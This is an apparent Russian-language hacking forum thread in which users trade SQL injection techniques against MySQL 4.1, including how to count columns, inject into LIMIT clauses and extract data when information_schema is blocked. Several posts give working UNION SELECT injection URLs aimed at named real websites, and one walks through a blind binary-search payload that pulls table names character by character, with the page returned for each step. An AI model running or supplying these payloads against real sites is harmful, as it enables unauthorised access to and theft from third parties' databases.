Здравствуйте! Произвел sql inj. Есть таблица users в ней вся регистрационная информация о пользователях+(столб с названием pass). У всех пользователей в ячейках pass пусто. Что делать? Доступ к information schema закрыт.(Load_FILE тоже не работает). версия мускула 4.1.22-standard
Разъяснить, как вы подобрали количество полей +orde+by+3 +--+ +group+by+3+--+ не проходят, или это простая подстановка +union+select+1,2,3+--+ в запрос
Товарисч сенсей, в MySQL запросах комментарий не обрамляется с обеих сторон пробелами. В SQLi-иньекциях, которые находятся в LIMIT'e, конструкция ORDER BY не допускается к использованию. Таков синтаксис языка. Ааа, ну ок. Вопросов больше не имею.
Как такие скули, находятся. Запросы типа http://www.shoptop.ru/sitemap.html?lim1=8252-1 http://www.shoptop.ru/sitemap.html?lim1=8252 and 1=0 http://www.shoptop.ru/sitemap.html?lim1=8252 and true=false http://www.shoptop.ru/sitemap.html?lim1=8252*1 на нее не указывают Проги Acunetix Web Vulnerability Scanner, WebCruiser ее не находят
Тут сразу видно, что используется limit, поэтому его дописываем, подбираем кол во полей вручную и комментарий. Знаю, так немного удобнее для меня.
Code: divantvplus.ru/index.html?id=390%20and%201=2+union+select+1,2,3,4,5,6,7,8,9,10,11--+ Не могу разобрать почему отображается так?!
Потому что значение поля 6 используется скриптом для вывода данных. http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0x35,1,1,1,1,1--+ http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0x36,1,1,1,1,1--+ http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0x31,1,1,1,1,1--+ http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,0x30,1,1,1,1,1--+ Имеем 4 различных состояния. При использовании бинарного поиска на один символ максимум 4 запроса.
Пример получения первого символа запроса "select group_concat(table_name) from information_schema.tables where table_name like '%user%'" Code: http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>128,if(@x>196,0,1),if(@x>64,5,6)),1,1,1,1,1--+ Возвращает страницу 5. Код символа в диапазоне (64;128] Code: http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>96,if(@x>112,0,1),if(@x>80,5,6)),1,1,1,1,1--+ Возвращает страницу 5. Код символа в диапазоне (80;96] Code: http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>88,if(@x>92,0,1),if(@x>84,5,6)),1,1,1,1,1--+ Возвращает страницу 5. Код символа в диапазоне (84;88] Code: http://divantvplus.ru/index.html?id=390+and+1=2+union+select+1,1,1,1,1,if((@x:=(ascii(mid((select+group_concat(table_name)+from+information_schema.tables+where+table_name+like+0x257573657225),1,1))))>86,if(@x>87,0,1),if(@x>85,5,6)),1,1,1,1,1--+ Возвращает страницу 6. Код символа равен 85
Объясни мне детально вот эту часть запроса: Code: ,1,1))))>128,if(@x>196,0,1),if(@x>64,5,6)) Посимвольно) Cпасибо.
не уложилось в голове... Давай примером , как мне оттуда достать второй символ? ,1,1(Почему 1,1 какой в этом смысловой нагруз?)))))>128(почму именно 128?),if(@x>196(Почему именно со 196 сравнение?),0,1(почему 0,1?)),if(@x>64,5,6(Тут тоже не понятно откудо взялось 64, что такое 5,6)))